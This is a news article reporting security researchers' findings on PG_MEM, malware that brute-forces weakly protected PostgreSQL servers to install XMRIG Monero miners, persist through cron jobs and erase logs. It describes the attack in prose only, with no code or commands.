Researchers at Aqua Nautilus have recently unveiled a sophisticated malware strain that specifically targets PostgreSQL servers, enabling the deployment of cryptocurrency miners. This discovery highlights a significant cybersecurity threat, as the firm has identified over 800,000 servers that may be vulnerable to a cryptojacking campaign aimed at PostgreSQL, a widely used open-source relational database management system.
According to a detailed research report shared with crypto.news, the malware, dubbed “PG_MEM,” initiates its attack by employing brute force techniques to gain unauthorized access to PostgreSQL databases, particularly those secured with weak passwords. Once it successfully infiltrates a database, PG_MEM establishes a superuser role, granting it administrative privileges that allow it to exert full control over the database environment and restrict access for legitimate users.
With this elevated access, the malware can execute shell commands on the host system, paving the way for the download and deployment of additional malicious payloads. The report indicates that these payloads consist of two files specifically designed to facilitate the malware’s evasion of detection, configure the system for cryptocurrency mining, and deploy the XMRIG mining tool, which is commonly used for mining Monero (XMR).
XMRIG has gained popularity among cybercriminals due to Monero’s privacy features, which make its transactions difficult to trace. A notable incident last year involved an educational platform that was compromised in a cryptojacking operation, where attackers stealthily deployed a script that installed XMRIG on every visitor’s device.
Malware hijacks PostgreSQL servers to deploy crypto miners
Further analysis reveals that PG_MEM not only installs its mining operations but also removes existing cron jobs—automated tasks scheduled to run at specific intervals on the server. In their place, the malware creates new cron jobs to ensure the continuity of the cryptocurrency mining process, even in the event of server restarts or temporary halts of certain processes. To maintain its stealth, PG_MEM systematically deletes files and logs that could potentially reveal its activities to system administrators.
The researchers have cautioned that while the primary objective of this campaign is to deploy cryptocurrency miners, the attackers simultaneously gain control over the affected servers, underscoring the severity of this threat. Cryptojacking campaigns targeting PostgreSQL databases have been a persistent issue over the years. In 2020, researchers from Palo Alto Networks’ Unit 42 identified a similar cryptojacking campaign involving the PgMiner botnet. Additionally, the StickyDB botnet was discovered in 2018, which also targeted servers to mine Monero.
